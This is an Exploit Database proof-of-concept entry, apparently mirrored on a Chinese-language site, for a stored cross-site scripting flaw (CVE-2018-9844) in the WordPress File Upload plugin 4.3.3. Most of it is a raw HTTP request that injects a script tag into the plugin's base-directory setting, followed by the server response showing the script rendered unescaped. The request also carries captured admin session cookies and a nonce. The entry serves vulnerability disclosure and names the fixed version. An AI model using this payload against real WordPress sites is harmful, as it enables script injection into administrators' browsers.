WordPress Plugin File Upload 4.3.3 – Stored Cross-Site Scripting (PoC)

• Exploit Database
• 37 阅读

• 作者： ManhNho
  日期： 2018-04-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44444/

• # Exploit Title: WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
  # Date: 06/04/2018
  # Exploit Author: ManhNho
  # Vendor Homepage: https://www.iptanus.com/
  # Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip
  # Version: 4.3.3
  # Tested on: Windows 7 / Cent OS 6.5
  # CVE : CVE-2018-9844
  # Category : Webapps
  
  Description
  ===========
  WordPress File Upload is a WordPress plugin with more than 20.000 active
  installations.
  Version 4.3.3 (and possibly previous versions) are affected by a Stored XSS
  vulnerability in the admin panel ,related to the "Edit_Setting"
  functionality.
  
  
  PoC
  ===============
  Request:
  
  POST /wp-admin/options-general.php?page=wordpress_file_upload&action=edit_settings
  HTTP/1.1
  Host: 192.168.1.66
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101
  Firefox/59.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Referer: http://192.168.1.66/wp-admin/options-general.php?page=
  wordpress_file_upload&action=plugin_settings
  Content-Type: multipart/form-data; boundary=---------------------
  ------27678165033834
  Content-Length: 906
  Cookie: wordpress_ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
  7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7Ca3c7a75afaaf9ce1db3596b8aa83
  3adeb337f313ef5156fbf93096c1af0cdbbc; wp-settings-1=libraryContent%3Dbrowse;
  wp-settings-time-1=1522504284; PHPSESSID=o6smfv1u6p8rh7cu7v7gl9lm47;
  wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_
  ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759%
  7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7C1993c93121805782b8bee82cd013
  6f1a6aa286d4294ed58cb6f95539acdfe5d5
  Connection: close
  Upgrade-Insecure-Requests: 1
  
  -----------------------------27678165033834
  Content-Disposition: form-data; name="_wpnonce"
  
  c9d5733e36
  -----------------------------27678165033834
  Content-Disposition: form-data; name="_wp_http_referer"
  
  /wp-admin/options-general.php?page=wordpress_file_upload&
  action=plugin_settings
  -----------------------------27678165033834
  Content-Disposition: form-data; name="action"
  
  edit_settings
  -----------------------------27678165033834
  Content-Disposition: form-data; name="wfu_basedir"
  
  <script>alert('XSS')</script>
  -----------------------------27678165033834
  Content-Disposition: form-data; name="wfu_postmethod"
  
  fopen
  -----------------------------27678165033834
  Content-Disposition: form-data; name="wfu_admindomain"
  
  siteurl
  -----------------------------27678165033834
  Content-Disposition: form-data; name="submitform"
  
  Update
  -----------------------------27678165033834--
  
  Response:
  
  HTTP/1.1 200 OK
  Date: Thu, 05 Apr 2018 18:15:01 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  Pragma: no-cache
  X-Frame-Options: SAMEORIGIN
  Referrer-Policy: same-origin
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 28623
  ...
  
  <input name="wfu_basedir" id="wfu_basedir" type="text"
  value="<script>alert('XSS')</script>" />
  <p style="cursor: text; font-size:9px; padding: 0px; margin: 0px; width:
  95%; color: #AAAAAA;">Current value: <strong><script>alert('XSS')</
  script></strong></p>
  ...
  
  
  References
  ===============
  New Version 4.3.4 of WordPress File Upload Plugin
  
  WordPress File Upload
  
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9844